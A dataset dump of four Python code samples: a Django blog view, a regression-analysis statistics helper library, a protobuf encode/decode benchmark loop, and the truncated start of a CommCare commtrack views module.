content stringlengths 5 1.05M |
|---|
from django.shortcuts import render, get_object_or_404
from django.core.paginator import Paginator
from general_models.models import GeneralModel
def writing_home(request):
writing_posts = GeneralModel.objects.order_by('-publish_date').filter(is_published=True, category='writing')
paginator = Paginator(writing_posts, 5)
page = request.GET.get('page')
paged_posts = paginator.get_page(page)
context = {
'title': 'Writing',
'posts': paged_posts
}
return render(request, 'writing/writing.html', context)
|
from matplotlib import pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
import scipy.stats as stats
import statsmodels.api as sm
import statsmodels.stats.api as sms
import statsmodels.formula.api as smf
import statsmodels.stats.multicomp as smm
import statsmodels.stats.outliers_influence as sso
import statsmodels
import statistics
import math
import time
import itertools
from scipy.optimize import curve_fit
from statsmodels.tsa.ar_model import AutoReg, ar_select_order
from statsmodels.tsa.api import acf, pacf, graphics
# compute p value from t statistics
def tpv (stat, dof, tail):
if (tail == 'r'):
return 1 - stats.t.cdf(stat, df = dof) #right
elif (tail == 'l'):
return stats.t.cdf(stat, df = dof) #left
elif (tail == 'db'):
if(stats.t.cdf(stat, df = dof) > 0.5):
return 2 * (1 - stats.t.cdf(stat, df = dof)) # double
else:
return 2 * stats.t.cdf(stat, df = dof) # double
else:
return -1 # error
# p value interpretation
def pvSig (pv):
print("\n====== p value significance ======")
if (pv <= 0.01):
print(">>> highly sig, overwhelming evidence\n sig, strong evidence\n not sig, weak evidence\n not sig, little to no evidence")
elif (pv <= 0.05 and pv > 0.01):
print(" highly sig, overwhelming evidence\n>>> sig, strong evidence\n not sig, weak evidence\n not sig, little to no evidence")
elif (pv <= 0.1 and pv > 0.05):
print(" highly sig, overwhelming evidence\n sig, strong evidence\n>>> not sig, weak evidence\n not sig, little to no evidence")
elif (pv > 0.1):
print(" highly sig, overwhelming evidence\n sig, strong evidence\n not sig, weak evidence\n>>> not sig, little to no evidence")
else:
print("BAD INPUT")
print("===================================\n")
# r value interpretation
def rvInter (rv):
print("\n====== R value interpretation ======")
if (rv > 0):
print(" [positive]")
elif (rv <0):
print(" [negative]")
else:
print(" [no linear rellation]")
return
if (abs(rv) <= 0.25):
print(" very strong\n moderately strong\n moderately weak\n>>> very weak")
elif (abs(rv) <= 0.5 and abs(rv) > 0.25):
print(" very strong\n moderately strong\n>>> moderately weak\n very weak")
elif (abs(rv) <= 0.75 and abs(rv) > 0.5):
print(" very strong\n>>> moderately strong\n moderately weak\n very weak")
elif (abs(rv) <= 1 and abs(rv) > 0.75):
print(">>> very strong\n moderately strong\n moderately weak\n very weak")
else:
print("BAD INPUT")
print("====================================\n")
def simple_regplot(df, xname, yname):
_ = sns.regplot(x = xname, y = yname, data = df, color = 'b', ci = None)
plt.title('Scatter Plot')
plt.xlabel(xname)
plt.ylabel(yname)
plt.show()
def simple_regmod(df, xname, yname):
# Fit regression model
result1 = smf.ols(yname + '~ ' + xname, data = df).fit()
# Inspect the results
print(result1.summary())
b1_1 = result1.params[1]
b0_1 = result1.params[0]
print(f"Estimated model: y = {b0_1:.4f} + {b1_1:.4f} x")
def simple_durbin_watson(df, xname, yname, alpha = 0.05):
print("\n\n========== Durbin-Watson ==========\n")
y_data = df[yname]
x_data_ar = []
x_data_ar = np.asarray(df[xname])
x_data_T = x_data_ar.T
x_data = pd.DataFrame({xname:x_data_T})
x_data2 = sm.add_constant(x_data)
olsmod = sm.OLS(y_data, x_data2)
result = olsmod.fit()
st, data, ss2 = sso.summary_table(result, alpha = alpha)
print("Columns in data are: %s" % ss2)
# Predicted value
y_pre = data[:, 2]
# Studentized Residual
SD = data[:, 10]
x_square_sum = np.vdot(SD, SD)
print("x_square_sum = ", x_square_sum)
size = SD.size
print("size = ", size)
x_d = np.zeros((size))
print("x_d = ", x_d)
l_size = size - 1
for i in range(l_size):
x_d[i + 1] = SD[i + 1] - SD[i]
print("x_d = ", x_d)
d = np.vdot(x_d, x_d) / x_square_sum
print("d = ", d)
def chi2_normtest (stand_res, N, alpha = 0.05):
m = np.mean(stand_res)
s = np.std(stand_res)
prob_bins = np.zeros((N + 1))
z_bins = np.zeros((N + 1))
z_bins[0] = -4
z_bins[N] = 4
for i in range(0, N+1):
prob_bins[i] = i/N
for j in range(1, N):
z_bins[j] = m + stats.norm.isf(1 - prob_bins[j]) * s
counts, bins = np.histogram(stand_res, bins=z_bins)
nobs = counts.sum()
prob_e = np.zeros((N))
for i in range(1, N+1):
prob_e[i - 1] = prob_bins[i] - prob_bins[i - 1]
freq_e = nobs * prob_e
freq_o = counts
if np.sum(freq_e < 5) > 0:
print("Rule of five is not met.")
else:
chi_stat, pval = stats.chisquare(freq_o, freq_e)
chi_pval = stats.chi2.sf(chi_stat, N - 3)
print("Chi-squared test: statistics = %0.4f, p-value = %0.4f" % (chi_stat, chi_pval))
df = freq_o.shape[0]-3
crit_value = stats.chi2.ppf(1 - alpha, df)
print("Critical value = %0.4f (defree of freedom = %d)" % (crit_value, df))
return chi_pval
def runsTest(l, l_median):
runs, n1, n2 = 1, 0, 0
if(l[0]) >= l_median:
n1 += 1
else:
n2 += 1
# Checking for start of new run
for i in range(len(l)):
# no. of runs
if (l[i] >= l_median and l[i-1] < l_median) or (l[i] < l_median and l[i-1] >= l_median):
runs += 1
# print(i, runs)
# no. of positive values
if(l[i]) >= l_median:
n1 += 1
# no. of negative values
else:
n2 += 1
runs_exp = ((2*n1*n2)/(n1+n2)) + 1
stan_dev = math.sqrt((2*n1*n2*(2*n1*n2-n1-n2))/(((n1+n2)**2)*(n1+n2-1)))
z = (runs-runs_exp)/stan_dev
pval_z = stats.norm.sf(abs(z)) * 2
print('runs = ', runs)
print('n1 = ', n1)
print('n2 = ', n2)
print('runs_exp = ', runs_exp)
print('stan_dev = ', stan_dev)
print('z = ', z)
print('pval_z = ', pval_z)
return pval_z
def simple_residual(df, xname, yname, alpha = 0.05, resd_all = False, nobins = 6):
print("\n\n----------------------------\n|Residual Analysis - simple|\n----------------------------\n")
print("using alpha = ", alpha)
print("\n\n ◆ Residuals\n")
# Fit regression model
result = smf.ols(yname + '~' + xname, data = df).fit()
# studentized residual
st1, data1, ss3 = sso.summary_table(result, alpha = alpha)
Residual = data1[:, 8]
STD_Residual = data1[:,10]
mu = np.mean(STD_Residual)
sigma = np.std(STD_Residual)
if(resd_all == True):
print("Original Residuals: \n", Residual, "\n")
print("Standardized Residuals: \n", STD_Residual, "\n")
print("mu:", mu)
print("sigma:", sigma)
else:
print("mu:", mu)
print("sigma:", sigma)
# Normality Test
print("\n\n ◆ Error Normality Test\n")
print("H0: Errors are normally distributed.")
print("H1: Errors are not normally distributed.")
# Histogram
print("\n\n ◇ Histogram\n")
counts, bins, patches = plt.hist(STD_Residual, nobins, density = False, facecolor = 'black', alpha = 0.75)
plt.xlabel('Standardized Residuals')
plt.ylabel('Frequency')
plt.title('Histogram of Standardized Residuals')
plt.grid(True)
bin_centers = [np.mean(k) for k in zip(bins[:-1], bins[1:])]
plt.show()
print(counts)
print(bins)
# Shapiro Test
print("\n\n ◇ Shapiro Test\n")
stat, spv = stats.shapiro(STD_Residual)
print(f"Statistics = {stat:.4f}, p-value = {spv:.4f}")
pvSig(spv)
# Chi^2 Test
print("\n\n ◇ Chi-squared Test\n")
stand_res = STD_Residual
N = nobins
m = np.mean(stand_res)
s = np.std(stand_res)
prob_bins = np.zeros((N + 1))
z_bins = np.zeros((N + 1))
z_bins[0] = -4
z_bins[N] = 4
for i in range(0, N+1):
prob_bins[i] = i/N
for j in range(1, N):
z_bins[j] = m + stats.norm.isf(1 - prob_bins[j]) * s
counts, bins = np.histogram(stand_res, bins=z_bins)
nobs = counts.sum()
prob_e = np.zeros((N))
for i in range(1, N+1):
prob_e[i - 1] = prob_bins[i] - prob_bins[i - 1]
freq_e = nobs * prob_e
freq_o = counts
if np.sum(freq_e < 5) > 0:
print("Rule of five is not met.")
else:
chi_stat, pval = stats.chisquare(freq_o, freq_e)
chi_pval = stats.chi2.sf(chi_stat, N - 3)
print("Chi-squared test: statistics = %0.4f, p-value = %0.4f" % (chi_stat, chi_pval))
df_fq = freq_o.shape[0]-3
crit_value = stats.chi2.ppf(1 - alpha, df_fq)
print("Critical value = %0.4f (defree of freedom = %d)" % (crit_value, df_fq))
#pvSig(chi_pval)
# Homoscedasticity and Heteroscedasticity
print("\n\n ◆ Homoscedasticity and Heteroscedasticity\n")
print("H_0: Randomness exists")
print("H_1: Randomness doesn't exist")
Id1 = data1[:, 0]
plt.plot(Id1, STD_Residual, 'o', color = 'gray')
plt.axhline(y=0, color = 'blue')
plt.axhline(y=2, color = 'red')
plt.axhline(y=-2, color = 'red')
plt.title('Standardized Residual Plot')
plt.xlabel('Observation No.')
plt.ylabel('Standardized Residual')
plt.show()
# Dependence of the Error Variable
print("\n\n ◆ Dependence of the Error Variable (Run Test)\n")
print("H_0: Sample is random")
print("H_1: Sample is not random")
SD_median = statistics.median(STD_Residual)
Z_pval = runsTest(STD_Residual, SD_median)
print('p-value for run test z-statistic= ', Z_pval)
pvSig(Z_pval)
# Outliers
print("\n\n ◆ Outliers Finding\n")
print("(remove by yourself!)\n")
df_out = pd.DataFrame(STD_Residual, columns = ['SD'])
filter = (df_out['SD'] < -2) | (df_out['SD'] > 2)
print("Outliers by SD = ")
print(df_out['SD'].loc[filter])
print("\nActual ID: ", df_out['SD'].loc[filter].index+1)
# Influential Observations
print("\n\n ◆ Influential observations Finding\n")
x_data = df[xname].values
y_data = df[yname].values
cov_mat1 = np.cov(y_data, x_data)
x_data_bar = x_data.mean()
data_nobs = len(x_data)
h_val = 1 / data_nobs + (x_data - x_data_bar) ** 2 / (data_nobs - 1) / cov_mat1[1,1]
# print(h_val)
df_hi = pd.DataFrame(h_val, columns = ['hi'])
filter = (df_hi['hi'] > nobins / data_nobs )
print("Influential Observations by hi = ", df_hi['hi'].loc[filter])
print("\nAutal ID: ", df_hi['hi'].loc[filter].index+1)
def simple_modass(df, xname, yname, alpha = 0.05, tail = 'db'):
# Fit regression model
result1 = smf.ols(yname + '~ ' + xname, data = df).fit()
b1_1 = result1.params[1]
b0_1 = result1.params[0]
print(f"Estimated model: y = {b0_1:.4f} + {b1_1:.4f} x")
print("\n\n---------------------------\n| Model Assessing |\n---------------------------\n")
print("using alpha = ", alpha)
print("\n\n ◆ Standard Error of Estimate\n")
s2_e = result1.mse_resid
print(f"MSE = {s2_e:f}")
s_e = result1.mse_resid ** 0.5
print(f"Standard errors = {s_e:f}")
y_bar = df[yname].mean()
print(f"y mean = {y_bar:.4f}")
print(f"The absolute value of standard errors is about {abs(s_e/y_bar)*100:.0f}% of mean of independent variables.\n")
print("\n\n ◆ Coefficient of Determination\n")
R2 = result1.rsquared
print(f"R^2 = {R2:f}")
R = np.sign(b1_1) * R2 ** 0.5
print(f"R = {R:f}")
print(f"\nR^2 value interpretation\nAbout {R2*100:.0f}% of the variation in the dependent variables is explained by independent ones, the rest remains unexplained.")
rvInter(R)
print("\n\n ◆ Studetn-t test for beta1(slope)\n")
dof = len(df) - 2
tv = R * ((dof - 2)/(1 - R ** 2)) ** 0.5
LCL = stats.t.ppf(alpha / 2, dof - 2)
UCL = stats.t.ppf(1 - alpha / 2, dof - 2)
print('t = ', tv)
print('t_LCL = ', LCL)
print('t_UCL = ', UCL)
print(f"\np-value of t-stat tail: {tail}")
tp = tpv(tv, dof, tail)
print("p-value of t test = ", tp)
pvSig(tp)
print("\n\n ◆ Coefficient of Correlation\n")
cor_mat = np.corrcoef(df[[xname, yname]].values, rowvar = False)
n = df.shape[0]
r = cor_mat[1,0]
tv_cc = r * ((n-2)/(1 - r**2)) ** 0.5
t_critical = stats.t.ppf(0.975, n - 2)
pval = stats.t.sf(np.abs(tv_cc), n - 2)*2
print('r = ', r)
print('t_critical = ', t_critical)
print('t = ', tv_cc)
print('p_value = ', pval)
def simple_CIPIPRE (x, y, x1, alpha = 0.05):
print("\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n|CI PI for simple regression|\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n")
print("using alpha = ", alpha)
x_new = np.array([1, x1])
print("make Confidence Interval and Prediction Interval predictions at mean of x = ", x1)
x2 = sm.add_constant(x)
olsmod = sm.OLS(y, x2)
result_reg = olsmod.fit()
y_head = np.dot(result_reg.params, x_new)
print("y_head = ", y_head)
(t_minus, t_plus) = stats.t.interval(alpha = (1.0 - alpha), df = result_reg.df_resid )
cov_mat1 = np.cov(y, x)
x_bar = x.mean()
core1 = (1 / result_reg.nobs + (x1 - x_bar) ** 2 / (result_reg.nobs - 1) / cov_mat1[1,1] ) ** 0.5
core2 = (1 + 1 / result_reg.nobs + (x1 - x_bar) ** 2 / (result_reg.nobs - 1) / cov_mat1[1,1] ) ** 0.5
lower_bound = y_head + t_minus * (result_reg.mse_resid ** 0.5) * core1
upper_bound = y_head + t_plus * (result_reg.mse_resid ** 0.5) * core1
half_interval = t_plus * (result_reg.mse_resid ** 0.5) * core1
lower_bound2 = y_head + t_minus * (result_reg.mse_resid ** 0.5) * core2
upper_bound2 = y_head + t_plus * (result_reg.mse_resid ** 0.5) * core2
half_interval2 = t_plus * (result_reg.mse_resid ** 0.5) * core2
print(f"\n{100*(1-alpha):.0f}% confidence interval for mean: [{lower_bound:.4f}, {upper_bound:.4f}], or {y_head:.4f} +- {half_interval:.4f}")
print(f"\n{100*(1-alpha):.0f}% prediction interval: [{lower_bound2:.4f}, {upper_bound2:.4f}], or {y_head:.4f} +- {half_interval2:.4f}")
def simple_CIPIINT_regplot(df, xname, yname, alpha = 0.05):
print("\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n|CI PI Interval plot - simple|\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n")
print("using alpha = ", alpha)
df_sorted = df.sort_values([xname])
result = smf.ols(yname + '~' + xname, data = df_sorted).fit()
x = df_sorted[xname].values
y = df_sorted[yname].values
st, data, ss2 = sso.summary_table(result, alpha = alpha)
fittedvalues = data[:, 2]
predict_mean_se = data[:, 3]
predict_mean_ci_low, predict_mean_ci_upp = data[:, 4:6].T
predict_ci_low, predict_ci_upp = data[:, 6:8].T
plt.plot(x, y, 'o', color = 'gray')
plt.plot(x, fittedvalues, '-', lw=0.5)
plt.plot(x, predict_mean_ci_low, 'r-', lw=0.4)
plt.plot(x, predict_mean_ci_upp, 'r-', lw=0.4)
plt.plot(x, predict_ci_low, 'b--', lw=0.4)
plt.plot(x, predict_ci_upp, 'b--', lw=0.4)
plt.title('CI PI plot')
plt.xlabel(xname)
plt.ylabel(yname)
plt.legend(['data points', 'regression model', 'confidence interval', 'prediction interval'], title = 'Legends', bbox_to_anchor = (1.3, 1), prop={'size': 6})
plt.show()
def simple(step, df, xname, yname, alpha = 0.05, tail = 'db', nobins = 6, resd_all = False):
if step == 1:
simple_regplot(df, xname, yname)
elif step == 2:
print("\npropose a statistical model\n")
elif step == 3:
simple_regmod(df, xname, yname)
elif step == 4:
print("\nfor autocorrelation and others, please determine by yourself!\n")
simple_durbin_watson(df, xname, yname, alpha = alpha)
elif step == 5:
print("\nremember to remove outliers or do some modifications.\n")
simple_residual(df, xname, yname, alpha = alpha, resd_all = resd_all, nobins = nobins)
elif step == 6:
simple_modass(df, xname, yname, alpha = alpha, tail = tail)
elif step == 7:
print("\ninterpretation\n")
elif step == 8:
print("\nsimple_CIPIPRE(df[xname], df[yname], x_input...) won't run here\n")
simple_CIPIINT_regplot(df, xname, yname, alpha = alpha)
else:
print("\nbad input for step!\n")
def multiple_regplot(df, xnames, yname):
for aname in xnames:
x_var = df[aname].values
_ = sns.regplot(x = x_var, y = df[yname].values, data = df, color = 'b', ci = None)
plt.xlabel(aname)
plt.ylabel(yname)
plt.show()
df_ = df[[yname] + xnames]
corr1 = df_.corr()
corr1
_ = sns.heatmap(corr1, annot = True)
def multiple_modpropose(xnames, yname):
print("\n\n---------- Model Proposal ----------\n")
print("Model proposal,<br>")
mod = "$y = \\beta_0 + "
for i in range(len(xnames)):
coe = "\\beta_" + str(i+1) + "x_" + str(i+1) + " + "
mod = mod + coe
mod = mod + "\\epsilon$<br>"
print(mod)
print("where y is ", yname, "<br>")
exp = "and "
for j in range(len(xnames)):
xexp = "$x_" + str(j+1) + "$ is " + xnames[j] + ", "
exp = exp + xexp
print(exp)
def multiple_regmod(df, xnames, yname, alpha = 0.05):
y_data = df[yname]
x_data_ar = []
for i in range(len(xnames)):
x_data_ar.append(df[xnames[i]])
x_data_ar = np.asarray(x_data_ar)
x_data_T = x_data_ar.T
x_data = pd.DataFrame(x_data_T, columns = xnames)
x_data2 = sm.add_constant(x_data)
olsmod = sm.OLS(y_data, x_data2)
result = olsmod.fit()
print(f"\n\nusing alpha = {alpha:.2f}")
print(result.summary())
print("\nEstimated model: y = %0.4f" % (result.params[0]), end = ' ')
for c, x in zip(result.params[1:], list(range(1,len(xnames)+1))):
print('+', end = '') if c> 0 else print('-', end = '')
print(" %0.4f x%d " % (abs(c), x), end = '')
def multiple_durbin_watson(df, xnames, yname, alpha = 0.05):
print("\n\n========== Durbin-Watson ==========\n")
y_data = df[yname]
x_data_ar = []
for i in range(len(xnames)):
x_data_ar.append(df[xnames[i]])
x_data_ar = np.asarray(x_data_ar)
x_data_T = x_data_ar.T
x_data = pd.DataFrame(x_data_T, columns = xnames)
x_data2 = sm.add_constant(x_data)
olsmod = sm.OLS(y_data, x_data2)
result = olsmod.fit()
st, data, ss2 = sso.summary_table(result, alpha = alpha)
print("Columns in data are: %s" % ss2)
# Predicted value
y_pre = data[:, 2]
# Studentized Residual
SD = data[:, 10]
x_square_sum = np.vdot(SD, SD)
print("x_square_sum = ", x_square_sum)
size = SD.size
print("size = ", size)
x_d = np.zeros((size))
print("x_d = ", x_d)
l_size = size - 1
for i in range(l_size):
x_d[i + 1] = SD[i + 1] - SD[i]
print("x_d = ", x_d)
d = np.vdot(x_d, x_d) / x_square_sum
print("d = ", d)
def multiple_residual(df, xnames, yname, alpha = 0.05, nobins = 6):
print("\n\n----------------------------\n|Residual Analysis - multiple|\n----------------------------\n")
print("using alpha = ", alpha)
print("\n\n ◆ Residuals\n")
y_data = df[yname]
x_data_ar = []
for i in range(len(xnames)):
x_data_ar.append(df[xnames[i]])
x_data_ar = np.asarray(x_data_ar)
x_data_T = x_data_ar.T
x_data = pd.DataFrame(x_data_T, columns = xnames)
x_data2 = sm.add_constant(x_data)
olsmod = sm.OLS(y_data, x_data2)
result = olsmod.fit()
st, data, ss2 = sso.summary_table(result, alpha = alpha)
print("Columns in data are: %s" % ss2)
# Predicted value
y_pre = data[:, 2]
# Studentized Residual
SD = data[:, 10]
mu = np.mean(SD)
sigma = np.std(SD)
# Normality Test
print("\n\n ◆ Error Normality Test\n")
print("H0: Errors are normally distributed.")
print("H1: Errors are not normally distributed.")
# Histogram
print("\n\n ◇ Histogram\n")
fig, ax = plt.subplots()
counts, bins, patches = plt.hist(SD, nobins, density=False, facecolor='g', alpha=0.75)
plt.xlabel('Standardized Residuals')
plt.ylabel('Frequency')
plt.title('Histogram of Standardized Residuals_Car Prices')
plt.grid(True)
bin_centers = [np.mean(k) for k in zip(bins[:-1], bins[1:])]
plt.show()
print(counts)
print(bins)
# qqplot
print("\n\n ◇ QQ-plot\n")
fig = sm.qqplot(SD, stats.norm, fit = True, line = '45')
plt.show()
print()
# Shapiro Test
print("\n\n ◇ Shapiro Test\n")
stat, spv = stats.shapiro(SD)
print(f"Statistics = {stat:.4f}, p-value = {spv:.4f}")
pvSig(spv)
# Chi^2 Test
print("\n\n ◇ Chi-squared Test\n")
stand_res = SD
N = nobins - 1
m = np.mean(stand_res)
s = np.std(stand_res)
prob_bins = np.zeros((N + 1))
z_bins = np.zeros((N + 1))
z_bins[0] = -4
z_bins[N] = 4
for i in range(0, N+1):
prob_bins[i] = i/N
for j in range(1, N):
z_bins[j] = m + stats.norm.isf(1 - prob_bins[j]) * s
counts, bins = np.histogram(stand_res, bins=z_bins)
nobs = counts.sum()
prob_e = np.zeros((N))
for i in range(1, N+1):
prob_e[i - 1] = prob_bins[i] - prob_bins[i - 1]
freq_e = nobs * prob_e
freq_o = counts
if np.sum(freq_e < 5) > 0:
print("Rule of five is not met.")
else:
chi_stat, pval = stats.chisquare(freq_o, freq_e)
chi_pval = stats.chi2.sf(chi_stat, N - 3)
print("Chi-squared test: statistics = %0.4f, p-value = %0.4f" % (chi_stat, chi_pval))
df_fq = freq_o.shape[0]-3
crit_value = stats.chi2.ppf(1 - alpha, df_fq)
print("Critical value = %0.4f (defree of freedom = %d)" % (crit_value, df_fq))
#pvSig(chi_pval)
# Homoscedasticity and Heteroscedasticity
print("\n\n ◆ Homoscedasticity and Heteroscedasticity\n")
print("H_0:Randomness exists")
print("H_0:Randomness doesn't exist")
st, data, ss2 = sso.summary_table(result, alpha = alpha)
print("\nColumns in data are: %s" % ss2)
# Predicted value
y_pre = data[:, 2]
# Studentized Residual
SD = data[:, 10]
plt.plot(y_pre, SD, 'o', color = 'gray')
plt.axhline(y=2, color = 'red', lw = 0.8)
plt.axhline(y=0, color = 'blue')
plt.axhline(y=-2, color = 'red', lw = 0.8)
plt.title('Standardized Residual Plot')
plt.xlabel('Predicted y value')
plt.ylabel('Standardized Residual')
plt.show()
##### autocorrelation
# Dependence of the Error Variable
print("\n\n ◆ Dependence of the Error Variable (Run Test)\n")
print("H_0: Sample is random")
print("H_1: Sample is not random")
print("\nColumns in data are: %s" % ss2)
Id1 = data[:, 0]
plt.plot(Id1, SD, 'o', color = 'gray')
plt.axhline(y=0, color = 'blue')
plt.axhline(y=2, color = 'red')
plt.axhline(y=-2, color = 'red')
plt.title('Standardized Residual Plot')
plt.xlabel('Observation No.')
plt.ylabel('Standardized Residual')
plt.show()
SD_median = statistics.median(SD)
Z_pval = runsTest(SD, SD_median)
print('p_value for Z-statistic= ', Z_pval)
pvSig(Z_pval)
# Outliers
print("\n\n ◆ Outliers Finding\n")
df_out = pd.DataFrame(SD, columns = ['SD'])
filter = (df_out['SD'] < -2) | (df_out['SD'] > 2)
print("Outliers by SD = ")
print(df_out['SD'].loc[filter])
print("\nActual ID: ", df_out['SD'].loc[filter].index+1)
## Influential Observations by hii
print("\n\n ◆ Influential observations Finding by hii\n")
x_data2 = np.array(x_data2)
H = np.matmul(x_data2, np.linalg.solve(np.matmul(x_data2.T, x_data2), x_data2.T))
df['hii'] = np.diagonal(H)
df_1h = pd.DataFrame(df['hii'])
k = result.df_model
n = len(df_1h['hii'])
h_level = 3 * (k+1) / n
print("h_level = ", h_level)
filter = (df_1h['hii'] > h_level)
print("\nInfluential Observations by hi =\n")
print(df_1h['hii'].loc[filter])
# Influential Observations by Cook's Distance
print("\n\n ◆ Influential observations Finding by Cook's Distance\n")
s2_e = result.mse_resid
k = result.df_model
y_a = data[:, 1]
y_f = data[:, 2]
h_i = df['hii']
CD_arr = np.square(y_a - y_f) / s2_e / (k - 1) * h_i / np.square(1 - h_i)
CD = np.array(CD_arr)
df_cd = pd.DataFrame(CD,columns = ['CD'])
print(df_cd.head())
filter = (df_cd['CD'] > 1 )
print("Influential Observations by Cook's Distances =\n")
print(df_cd['CD'].loc[filter])
def multiple_modass(df, xnames, yname, alpha = 0.05):
y_data = df[yname]
x_data_ar = []
for i in range(len(xnames)):
x_data_ar.append(df[xnames[i]])
x_data_ar = np.asarray(x_data_ar)
x_data_T = x_data_ar.T
x_data = pd.DataFrame(x_data_T, columns = xnames)
x_data2 = sm.add_constant(x_data)
olsmod = sm.OLS(y_data, x_data2)
result = olsmod.fit()
print("\n\n---------------------------\n| Model Assessing |\n---------------------------\n")
print("using alpha = ", alpha)
print("\n\n ◆ Standard Error of Estimate\n")
s2_e = result.mse_resid
print(f"MSE = {s2_e:f}")
s_e = result.mse_resid ** 0.5
print("Standard error = ", s_e)
y_bar = df[yname].mean()
print("y mean = ", y_bar)
print("y STD = ", df[yname].std())
print(f"The absolute value of standard errors is about {abs(s_e/y_bar)*100:.0f}% of mean of independent variables.\n")
R2 = result.rsquared
print("\nCoefficient of Determination")
print("R^2 = ", result.rsquared)
print("Adjusted R^2 = ", result.rsquared_adj)
print(f"\nR^2 value interpretation\nAbout {R2*100:.0f}% of the variation in the dependent variables is explained by the model, the rest remains unexplained.")
rvInter(R2**0.5)
print("\n\n ◆ Over-fitting?\n")
diffrra = abs(result.rsquared - result.rsquared_adj)
print("|R^2 - Ra^2| = ", diffrra)
if(diffrra > 0.06):
print("|R^2 - Ra^2| >= 0.06 indicating that the model has the problem of over-fitting.")
else:
print("|R^2 - Ra^2| < 0.06 indicating that the model doesn't have the problem of over-fitting.")
print("\n\n ◆ F-test of ANOVA\n")
print("Testing hypothesis,")
print("H_0: \beta_1 = \beta_2 = \dots = \beta_n = 0<br>")
print("H_1: \text{at least one } \beta_i \neq 0")
f_res = result.fvalue
MSE = result.mse_resid
df_model = result.df_model
df_error = result.df_resid
MSR = f_res * MSE
SSR = MSR * df_model
print("SSR = ", SSR, "\tdf = ", df_model, "\tMSR = ", MSR)
print("SSE = ", MSE * df_error, "\tdf = ", df_error, "\tMSE = ", MSE)
print("F = MSR / MSE = ", MSR / MSE)
fpv = result.f_pvalue
print("F p-value = ", fpv)
pvSig(fpv)
def multiple_CIPIPRE_ (xdata, yval, x1, alpha = 0.05):
print("\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n|CI PI for simple regression|\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n")
print("using alpha = ", alpha)
print("To make Confidence Interval and Prediction Interval prediction at mean of x = ", x1)
x_data_T = xdata.T
x_data2 = sm.add_constant(x_data_T)
olsmod = sm.OLS(yval, x_data2)
result_reg = olsmod.fit()
y_head = np.dot(result_reg.params, x1)
print("y_head = ", y_head)
(t_minus, t_plus) = stats.t.interval(alpha = (1.0 - alpha), df = result_reg.df_resid )
core1 = (result_reg.mse_resid * np.matmul(x1, np.linalg.solve(np.matmul(x_data2.T, x_data2), x1))) ** 0.5
lower_bound = y_head + t_minus * core1
upper_bound = y_head + t_plus * core1
core2 = (result_reg.mse_resid * (1 + np.matmul(x1, np.linalg.solve(np.matmul(x_data2.T, x_data2), x1)))) ** 0.5
lower_bound2 = y_head + t_minus * core2
upper_bound2 = y_head + t_plus * core2
print(f"\n{100*(1-alpha):.0f}% confidence interval for mean: [{lower_bound:.4f}, {upper_bound:.4f}]")
print(f"\n{100*(1-alpha):.0f}% prediction interval: [{lower_bound2:.4f}, {upper_bound2:.4f}]")
def multiple_CIPIPRE (df, xnames, yname, xx, alpha = 0.05):
x0 = [1]
x1 = x0 + xx
yval = df[yname]
xdata_ar = []
for i in range(len(xnames)):
xdata_ar.append(df[xnames[i]])
xdata_ar = np.asarray(xdata_ar)
x1_ = np.array(x1)
multiple_CIPIPRE_ (xdata_ar, yval, x1_, alpha)
def multiple(step, df, xnames, yname, alpha = 0.05, tail = 'db', nobins = 6):
if step == 1:
multiple_regplot(df, xnames, yname)
elif step == 2:
multiple_modpropose(xnames, yname)
elif step == 3:
multiple_regmod(df, xnames, yname)
elif step == 4:
print("\nfor autocorrelation and others, please determine by yourself!\n")
multiple_durbin_watson(df, xnames, yname, alpha = alpha)
elif step == 5:
print("\nremember to remove outliers or do some modifications.\n")
multiple_residual(df, xnames, yname, alpha = alpha, nobins = nobins)
elif step == 6:
multiple_modass(df, xnames, yname, alpha = alpha)
elif step == 7:
print("\ninterpretation\n")
elif step == 8:
print("\multiple_CIPIPRE (df, xnames, yname, xx...) won't run here\n")
else:
print("\nbad input for step!\n")
def time_add(df, name = 'Time'):
time = []
for i in range(df.shape[0]):
time.append(i)
print(time)
df[name] = time
return df
def value_map_ln(df, target):
lnv = []
for i in range(df.shape[0]):
lnv.append(math.log((df[target].values[i])))
newname = "ln_" + target
df[newname] = lnv
return df
def outliers_rm(df, out):
df = df.drop(df.index[out])
df = df.reset_index()
return df
|
import time
import sgeProto
data = {
'name': 'username1',
'id': [13245, 1,2,34,5],
'email': '1111112',
'phone': [
{ 'num': '1234', 'type': -1 },
{ 'num': '4321', 'type': -2 }
]
}
sgeProto.parseFile("../example.proto")
sgeProto.debug()
for i in range(10000000):
code = sgeProto.encode('Person', data)
pack_code = sgeProto.pack(code)
unpack_code = sgeProto.unpack(pack_code)
result = sgeProto.decode(unpack_code)
print(result)
time.sleep(2)
|
import copy
import decimal
import json
from django.contrib import messages
from django.core.exceptions import ValidationError
from django.db.utils import DataError
from django.http import Http404, HttpResponseBadRequest, HttpResponseRedirect
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from memoized import memoized
from casexml.apps.stock.models import StockTransaction
from corehq import toggles
from corehq.apps.commtrack.const import SUPPLY_POINT_CASE_TYPE
from corehq.apps.commtrack.processing import (
plan_rebuild_stock_state,
rebuild_stock_state,
)
from corehq.apps.domain.decorators import domain_admin_required
from corehq.apps.domain.views.base import BaseDomainView
from corehq.apps.hqwebapp.decorators import use_jquery_ui
from corehq.apps.hqwebapp.doc_info import get_doc_info_by_id
from corehq.apps.locations.models import LocationType, SQLLocation
from corehq.form_processor.exceptions import XFormNotFound
from corehq.form_processor.interfaces.dbaccessors import FormAccessors
from corehq.util.timezones.conversions import ServerTime
from .forms import CommTrackSettingsForm, ConsumptionForm
from .models import SQLActionConfig, SQLStockRestoreConfig
from .tasks import recalculate_domain_consumption_task
from .util import all_sms_codes
@domain_admin_required
def default(request, domain):
if not (request.project and request.project.commtrack_enabled):
raise Http404()
return HttpResponseRedirect(default_commtrack_url(domain))
def default_commtrack_url(domain):
from corehq.apps.products.views import ProductListView
return reverse(ProductListView.urlname, args=[domain])
class BaseCommTrackManageView(BaseDomainView):
section_name = ugettext_noop("Setup")
@property
def section_url(self):
